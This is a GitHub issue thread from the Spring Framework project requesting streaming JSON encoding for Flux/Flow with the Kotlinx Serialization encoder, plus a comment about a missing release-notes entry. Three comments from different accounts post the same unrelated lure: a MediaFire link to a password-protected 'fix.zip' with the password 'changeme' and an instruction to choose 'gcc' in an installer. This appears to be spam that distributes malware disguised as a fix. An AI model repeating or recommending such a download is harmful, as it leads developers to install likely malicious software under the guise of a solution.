### ISSUE TITLE
Avoid buffering all elements before sending JSON when using Flux/Flow + Kotlinx Serialization Encoder

### ISSUE THREAD

**Issue by PedroAlvarado** [spring-projects/spring-framework#33428]
**Affects:** 6.x.x

Similarly the following issue https://github.com/spring-projects/spring-framework/issues/28398, it would be great to have the same support when using kotlin serialization as implemented for [Jackson](https://github.com/spring-projects/spring-framework/commit/ce568468aed09147e335b5d5a717e1b2dac581a8).

---

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by izeye** [comment]
@bclozel added the "type: enhancement" label, but it seems to have been done after its release notes generation as an entry for this is missing in [its release notes](https://github.com/spring-projects/spring-framework/releases/tag/v6.2.0-RC1).
